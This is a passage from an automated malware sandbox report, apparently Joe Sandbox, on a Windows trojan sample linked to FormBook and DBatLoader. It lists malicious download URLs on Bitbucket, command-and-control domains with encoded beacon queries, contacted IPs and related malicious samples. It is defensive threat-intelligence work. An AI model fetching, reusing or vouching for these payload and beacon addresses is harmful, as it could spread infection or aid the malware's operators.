                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.wcp58.top/u071/true
                                    		unknown
                                    http://www.cpamerix.online/muj9/true
                                      		unknown
                                      http://www.wcp58.top/u071/?fvM8Gh=bBJc85dRrz6VYFP8GwFXoZFtfmuQO+iyQ8ywsDhPMj3PkpaAJncRlOwVGrcs7/oiPMEubiNmeHgqiRXMS1H3OK+Zq7VhNcw4P6d6BN/xAJTWHzjowpdO9JjlTFWXwfVVhN461s++G65d&DfDx=AFrxfzcH-Ldtrue
                                        		unknown
                                        https://bitbucket.org/akeem4u/canter/downloads/233_Ltspwqrtyswtrue
                                          		unknown
                                          http://www.lotus9.life/t67j/true
                                            		unknown
                                            http://www.98080753.xyz/eth5/true
                                              		unknown
                                              http://www.lotus9.life/t67j/?fvM8Gh=KowgBu3DXf0G7hBLtaH8s8ZzKm+VG/tpKZ1Q7eDBR0ArwNxjdNGLI+rTTcfRvEyEYs27WEZYXeTRVuyNENDuSquLWx1vE6gNEX6tkQ0IxcS5dAyUTa1RZ/bXBmbIS1WdqDLnMr1sBa9m&DfDx=AFrxfzcH-Ldtrue
                                                		unknown
                                                http://www.joshcharlesfitness.xyz/f2m8/?fvM8Gh=q8u1m2y9j/W78LyjRjBmLFBPluC1hJa5ZcIT7WbQRmUkJn/aUKn129a9SdOjfVpEuogWIbFDr3wrvEdEbURHbL899LelzoXXcWM6JsFHtDa1nH+G65yTIIp51Lx0C7/dwS8TcymTUlcC&DfDx=AFrxfzcH-Ldtrue
                                                  		unknown
                                                  http://www.facaicloud.top/dc1u/true
                                                    		unknown
                                                    http://www.facaicloud.top/dc1u/?fvM8Gh=fFgJrpU7aD7UkZlQpUegXiYX0mHuwd+xKsDAURMBiAqiBmSaSKvvh09Aihxa8ofx/ezcm777pnsov1VcpLBlwmC3Iqy+K+pafl2LF2kBMm3CKkFZyMytkoTfA5EUxo7rNsMcOhPX02Mw&DfDx=AFrxfzcH-Ldtrue
                                                      		unknown
                                                      http://www.cpamerix.online/muj9/?fvM8Gh=hgXo7easQgYwzYM50VVsBbrTpvYmtRva0zGF6x/wVx5xdFtAh4cdAJarj8a6/VZ0fLckawx66xls7kEuRRfHglkiUnpuSxGF6OqSwfVcl2N6vBJ8grdIeIpeinnOhUKuNcVRLIFrNYJr&DfDx=AFrxfzcH-Ldtrue
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://bitbucket.org/Qz10982283782.exe, 00000000.00000003.1283909227.0000000000727000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.000000000072D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://duckduckgo.com/chrome_newtabtakeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://duckduckgo.com/ac/?q=takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://reg.rutakeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		unknown
                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://bbuseruploads.s3.amazonaws.com/%z10982283782.exe, 00000000.00000003.1283909227.000000000073D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://remote-app-switcher.prod-east.frontend.public.atl-paas.netz10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://bbuseruploads.s3.amazonaws.com/Sz10982283782.exe, 00000000.00000002.1349705581.000000000074E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paajz10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtakeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://www.reg.ru/dedicated/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land_takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://aui-cdn.atlassian.com/z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.reg.ru/domain/new/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_landtakeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.reg.ru/hosting/?utm_source=www.cpamerix.online&utm_medium=parking&utm_campaign=s_land_hotakeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://bbuseruploads.s3.amazonaws.com:443/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2z10982283782.exe, 00000000.00000002.1349705581.0000000000777000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://www.reg.ru/whois/?check=&dname=www.cpamerix.online&amp;reg_source=parking_autotakeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://parking.reg.ru/script/get_domain_data?domain_name=www.cpamerix.online&rand=takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paaFz10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotakeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://www.lotus9.lifeObMmiCfBgqmt.exe, 0000000E.00000002.2494174819.0000000004C92000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://web-security-reports.services.atlassian.com/csp-report/bb-websitez10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-z10982283782.exe, 00000000.00000002.1385371181.00000000215EC000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1385371181.00000000215EA000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000733000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://www.ecosia.org/newtab/takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                		unknown
                                                                                                https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paaz10982283782.exe, 00000000.00000003.1283909227.000000000073D000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1284189717.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://dz8aopenkvv6s.cloudfront.netz10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://ac.ecosia.org/autocomplete?q=takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    https://bitbucket.org/akeem4u/canter/downloads/233_LtspwqrtyswXz10982283782.exe, 00000000.00000002.1349705581.00000000006EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://cdn.cookielaw.org/z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://www.reg.ru/sozdanie-saita/takeown.exe, 0000000D.00000002.2492977299.000000000407C000.00000004.10000000.00040000.00000000.sdmp, ObMmiCfBgqmt.exe, 0000000E.00000002.2492630368.000000000323C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;z10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1283864027.0000000000779000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netz10982283782.exe, 00000000.00000003.1311376015.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://www.pmail.comz10982283782.exe, z10982283782.exe, 00000000.00000003.1236423933.0000000002900000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1236633827.000000007F8FF000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1351975173.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000002.1416330856.000000007FA2F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=takeown.exe, 0000000D.00000003.1716978665.000000000774D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://remote-app-switcher.prod-east.frontend.z10982283782.exe, 00000000.00000002.1349705581.0000000000740000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000745000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://bbuseruploads.s3.amazonaws.com/z10982283782.exe, 00000000.00000002.1349705581.000000000074E000.00000004.00000020.00020000.00000000.sdmp, z10982283782.exe, 00000000.00000003.1311465099.0000000000752000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    185.166.143.48
                                                                                                                    		bitbucket.orgGermany
                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                    3.5.3.65
                                                                                                                    		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                                    		14618AMAZON-AESUSfalse
                                                                                                                    154.23.184.240
                                                                                                                    		wcp58.topUnited States
                                                                                                                    		174COGENT-174UStrue
                                                                                                                    74.48.31.123
                                                                                                                    		www.facaicloud.topCanada
                                                                                                                    		14663TELUS-3CAtrue
                                                                                                                    194.58.112.174
                                                                                                                    		www.cpamerix.onlineRussian Federation
                                                                                                                    		197695AS-REGRUtrue
                                                                                                                    3.33.130.190
                                                                                                                    		joshcharlesfitness.xyzUnited States
                                                                                                                    		8987AMAZONEXPANSIONGBtrue
                                                                                                                    54.231.236.129
                                                                                                                    		unknownUnited States
                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                    161.97.168.245
                                                                                                                    		www.98080753.xyzUnited States
                                                                                                                    		51167CONTABODEtrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1539808
                                                                                                                    Start date and time:2024-10-23 07:01:12 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 9m 6s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:19
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:z10982283782.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/1@11/8
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 75%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 94%
                                                                                                                    • Number of executed functions: 48
                                                                                                                    • Number of non-executed functions: 262
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    01:02:07API Interceptor1x Sleep call for process: z10982283782.exe modified
                                                                                                                    02:05:23API Interceptor2728929x Sleep call for process: takeown.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    185.166.143.48#U65b0#U7522#U54c1#U8a02#U55ae.vbsGet hashmaliciousFormBookBrowse
                                                                                                                      Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                                        https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                                                                          Z2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                                                                                            70973273827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                              ip4.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                Doc047892345y.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                  SecuriteInfo.com.Trojan.GenericKD.74258817.17122.7170.exeGet hashmaliciousVidar, XmrigBrowse
                                                                                                                                    849128312.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                      6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                                                                                                                        154.23.184.240890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • www.wcp58.top/u071/
                                                                                                                                        Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.wcq24.top/n6pg/
                                                                                                                                        Hesap-hareketleriniz10-15-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.wcq24.top/n6pg/
                                                                                                                                        PAYMENT ADVISE#9879058.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.wcq24.top/4jol/
                                                                                                                                        Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.wcq24.top/n6pg/
                                                                                                                                        PO2024033194.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.wcq24.top/i557/
                                                                                                                                        PO #86637.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.hm62t.top/edpl/
                                                                                                                                        PO2-2401-0016 (TR).exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.hm62t.top/p39s/
                                                                                                                                        invoice.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.hm62t.top/edpl/
                                                                                                                                        Purchase Order TE- 00011-7777.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.hm62t.top/p39s/

                                                                                                                                        Domains

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        www.cpamerix.online890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 194.58.112.174
                                                                                                                                        bitbucket.orgz11Nuevalistadepedidos.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 185.166.143.49
                                                                                                                                        #U65b0#U7522#U54c1#U8a02#U55ae.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        Z2tJveQl3B.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        PI and payment confirmed Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                        • 185.166.143.50
                                                                                                                                        890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 185.166.143.50
                                                                                                                                        https://bitbucket.org/aaa14/aaaa/downloads/script3.txtGet hashmaliciousUnknownBrowse
                                                                                                                                        • 185.166.143.50
                                                                                                                                        https://bitbucket.org/aaa14/aaaa/downloads/xwormberlyn.txtGet hashmaliciousUnknownBrowse
                                                                                                                                        • 185.166.143.49
                                                                                                                                        70973273827.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 185.166.143.48
                                                                                                                                        s3-w.us-east-1.amazonaws.comz11Nuevalistadepedidos.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 52.217.224.177
                                                                                                                                        #U65b0#U7522#U54c1#U8a02#U55ae.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                        • 3.5.29.106
                                                                                                                                        Order.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                        • 52.217.161.161
                                                                                                                                        https://bitbucket.org/36273637sunshine/sunshine/downloads/example.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 3.5.28.243
                                                                                                                                        https://www.bing.com/ck/a?!&&p=c60f44e2e0299106bbda17ed4610b6a047eac19fa538687ebec1fc78213d7903JmltdHM9MTcyOTEyMzIwMA&ptn=3&ver=2&hsh=4&fclid=234c270a-e3bc-6c48-2bf3-3210e2866d6d&psq=Siemens+v17&u=a1aHR0cHM6Ly9wbGM0bWUuY29tL2Rvd25sb2FkLXRpYS1wb3J0YWwtdjE3LWZ1bGwtdmVyc2lvbi1nb29nbGVkcml2ZS8&ntb=1Get hashmaliciousUnknownBrowse
                                                                                                                                        • 52.217.121.241
                                                                                                                                        https://vendor-agreement.s3.amazonaws.com/folder4/doc-11te68fpfa.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                        • 3.5.28.238
                                                                                                                                        Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 3.5.28.174
                                                                                                                                        Simple.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 3.5.28.119
                                                                                                                                        PI and payment confirmed Pdf.exeGet hashmaliciousDBatLoaderBrowse
                                                                                                                                        • 3.5.12.147
                                                                                                                                        890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 3.5.25.173
                                                                                                                                        www.facaicloud.top890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 74.48.31.123
                                                                                                                                        COMMERCIAL INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.31.123
                                                                                                                                        www.g4s7e5.biz890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 203.90.227.88

                                                                                                                                        ASNs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        AMAZON-AESUShttps://login.officefitnesschallenge.com/generate-doc-uid-mkopl4uyg6rde32wsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 3.228.199.139
                                                                                                                                        https://www.filemail.com/t/cFCAI9C4Get hashmaliciousHtmlDropperBrowse
                                                                                                                                        • 52.20.189.207
                                                                                                                                        https://login.officefitnesschallenge.com/generate-doc-uid-mkopl4uyg6rde32wsGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 3.228.199.139
                                                                                                                                        la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 52.0.148.51
                                                                                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 184.73.170.219
                                                                                                                                        https://careers.adobe.com/us/en/apply?jobSeqNo=ADOBUSR147673EXTERNALENUSGet hashmaliciousUnknownBrowse
                                                                                                                                        • 52.5.165.83
                                                                                                                                        Scan copy of document .pdfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 18.207.85.246
                                                                                                                                        roba.txtGet hashmaliciousMeterpreter, ReflectiveLoaderBrowse
                                                                                                                                        • 52.5.13.197
                                                                                                                                        https://link.edgepilot.com/s/638b11ee/5PAE0D7rGEubgiw42RPNhQ?u=https://flow.wirtube.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 44.195.238.119
                                                                                                                                        https://www.gn3atrk.com/DRDPB6M/361N8SL9/?sub1=WoeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 18.235.133.40
                                                                                                                                        TELUS-3CA890927362736.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                        • 74.48.31.123
                                                                                                                                        COMMERCIAL INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.31.123
                                                                                                                                        na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 74.48.138.31
                                                                                                                                        https://uspsi.cfd/Get hashmaliciousUnknownBrowse
                                                                                                                                        • 74.48.84.99
                                                                                                                                        PDF PURCHASE INQUIRY PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.34.14
                                                                                                                                        MV ALIADO-S-REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.34.14
                                                                                                                                        MV ALIADO - S-REQ-19-00064 List items.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.34.14
                                                                                                                                        MV ALIADO - S-REQ-19-00064.7Z.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.34.14
                                                                                                                                        176654 Grade B2FA, BRF-MBO2 & CX2OB.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 74.48.34.14
                                                                                                                                        UXJM4UoKhk.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                        • 74.48.143.82
                                                                                                                                        COGENT-174UShttps://www.filemail.com/t/cFCAI9C4Get hashmaliciousHtmlDropperBrowse
                                                                                                                                        • 23.237.50.106
                                                                                                                                        la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 38.54.122.172
                                                                                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 38.134.159.179
                                                                                                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 38.199.162.51
                                                                                                                                        FINAL SETTLEMENT DOCUMENT_ LIEN WAVER DURATION- 57185f7898fa8b51ebd3deed1492e65365186c19.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 154.12.225.231
                                                                                                                                        bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 154.23.181.7
                                                                                                                                        LTEXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletbrunkagerne.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 143.244.46.150
                                                                                                                                        PO1268931024 - Bank Slip.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                        • 38.88.82.56
                                                                                                                                        la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 38.58.105.199
                                                                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 38.64.166.57
                                                                                                                                        AMAZON-02UShttps://www.google.co.nz/url?q=nL206935ZEtyvV206935l&sa=t&url=amp/%69%70%66%6F%78%2E%63%6F%2E%75%6B%2F%70%61%67%65%73%2F%74%68%61%6E%6B%73%2E%68%74%6D%6C#cnlhbi5zcGVuY2VyQHVzLnlhemFraS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                        • 13.32.99.103
                                                                                                                                        https://www.filemail.com/t/cFCAI9C4Get hashmaliciousHtmlDropperBrowse
                                                                                                                                        • 18.245.46.55
                                                                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 52.222.187.148
                                                                                                                                        la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 15.193.139.34
                                                                                                                                        la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 18.246.200.125
                                                                                                                                        la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 3.249.6.186
                                                                                                                                        https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                                                                                        • 44.236.119.144
                                                                                                                                        https://zupimages.net/up/24/42/ol13.jpg?d6mSMvU0ZvpGwffnuqPHYMR7NvlxIzVjDfTD4YJjdRSCOccGet hashmaliciousUnknownBrowse
                                                                                                                                        • 52.49.91.133
